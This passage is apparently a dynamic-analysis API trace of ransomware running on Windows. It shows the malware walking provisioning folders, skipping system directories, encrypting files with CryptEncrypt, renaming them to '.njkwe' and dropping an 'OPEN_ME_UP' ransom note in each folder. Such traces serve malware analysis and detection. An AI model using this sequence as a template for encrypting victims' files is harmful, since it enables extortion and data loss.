pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\.") returned 95 [0076.029] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.029] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.029] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.029] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.029] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.029] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.029] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.029] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\..") returned 96 [0076.029] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.029] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.029] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fa1af1, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fa1af1, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fa1af1, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 1 [0076.029] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Windows") returned -1 [0076.029] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="$Recycle.bin") returned 1 [0076.029] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="System Volume Information") returned -1 [0076.029] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files") returned -1 [0076.029] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files (x86)") returned -1 [0076.029] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml") returned 133 [0076.029] StrStrIW (lpFirst="0__Power_EnergyEstimationEngine.provxml", lpSrch=".njkwe") returned 0x0 [0076.029] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.029] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="taridd") returned -1 [0076.029] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\0__Power_Ener", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.029] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\0__power_energyestimationengine.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.029] GetTickCount () returned 0x1153593 [0076.029] GetTickCount () returned 0x1153593 [0076.029] GetTickCount () returned 0x1153593 [0076.029] GetTickCount () returned 0x1153593 [0076.030] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.030] GetProcessHeap () returned 0xbe0000 [0076.030] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0076.030] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x21b, lpOverlapped=0x0) returned 1 [0076.035] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffde5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.035] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x21b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x21b, lpOverlapped=0x0) returned 1 [0076.035] GetProcessHeap () returned 0xbe0000 [0076.035] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0076.035] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.035] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.036] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.036] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.036] CloseHandle (hObject=0x43c) returned 1 [0076.036] GetProcessHeap () returned 0xbe0000 [0076.036] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.036] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe") returned 153 [0076.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\0__power_energyestimationengine.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\0__power_energyestimationengine.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.037] GetProcessHeap () returned 0xbe0000 [0076.037] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.037] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fa1af1, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fa1af1, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fa1af1, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 0 [0076.037] FindClose (in: hFindFile=0xc19e20 | out: hFindFile=0xc19e20) returned 1 [0076.037] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0076.037] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.038] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0076.039] CloseHandle (hObject=0x438) returned 1 [0076.039] GetProcessHeap () returned 0xbe0000 [0076.039] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.039] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fc7d5e, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fc7d5e, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fc7d5e, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x102, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0076.039] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0076.039] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0076.039] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0076.039] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0076.039] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0076.039] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml") returned 97 [0076.039] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0076.040] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.040] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0076.040] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.040] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.040] GetTickCount () returned 0x11535a3 [0076.040] GetTickCount () returned 0x11535a3 [0076.040] GetTickCount () returned 0x11535a3 [0076.040] GetTickCount () returned 0x11535a3 [0076.040] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0076.040] GetProcessHeap () returned 0xbe0000 [0076.040] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.040] ReadFile (in: hFile=0x438, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f04c*=0x102, lpOverlapped=0x0) returned 1 [0076.041] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.041] WriteFile (in: hFile=0x438, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f04c*=0x102, lpOverlapped=0x0) returned 1 [0076.041] GetProcessHeap () returned 0xbe0000 [0076.041] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.041] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.041] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0076.042] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0076.042] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0076.042] CloseHandle (hObject=0x438) returned 1 [0076.042] GetProcessHeap () returned 0xbe0000 [0076.042] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.042] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0076.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.043] GetProcessHeap () returned 0xbe0000 [0076.043] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.043] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fc7d5e, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fc7d5e, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fc7d5e, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x102, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0076.043] FindClose (in: hFindFile=0xc19ee0 | out: hFindFile=0xc19ee0) returned 1 [0076.043] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0076.043] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.044] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0076.044] CloseHandle (hObject=0x434) returned 1 [0076.044] GetProcessHeap () returned 0xbe0000 [0076.045] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.045] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0076.045] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0076.045] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0076.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.062] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0076.063] CloseHandle (hObject=0x430) returned 1 [0076.063] GetProcessHeap () returned 0xbe0000 [0076.063] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0076.063] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{99b095d8-5959-4820-bea7-7448c8427b4e}", cAlternateFileName="{99B09~1")) returned 1 [0076.063] lstrcmpiW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="Windows") returned -1 [0076.063] lstrcmpiW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="$Recycle.bin") returned 1 [0076.063] lstrcmpiW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="System Volume Information") returned -1 [0076.063] lstrcmpiW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="Program Files") returned -1 [0076.063] lstrcmpiW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="Program Files (x86)") returned -1 [0076.063] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned 80 [0076.063] lstrcmpW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2=".") returned 1 [0076.063] lstrcmpW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="..") returned 1 [0076.063] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.063] GetProcessHeap () returned 0xbe0000 [0076.063] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0076.063] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*") returned 82 [0076.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ee0 [0076.064] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.064] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.064] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.064] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.064] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.064] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\.") returned 82 [0076.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.064] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.064] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.065] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.065] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.065] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.065] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\..") returned 83 [0076.065] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.065] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e5b7d8, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e5b7d8, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e5b7d8, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x8c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0076.065] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0076.065] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0076.065] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0076.065] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0076.065] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0076.065] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned 99 [0076.065] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0076.065] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.065] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0076.065] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.065] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.065] GetTickCount () returned 0x11535c2 [0076.065] GetTickCount () returned 0x11535c2 [0076.065] GetTickCount () returned 0x11535c2 [0076.065] GetTickCount () returned 0x11535c2 [0076.065] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: 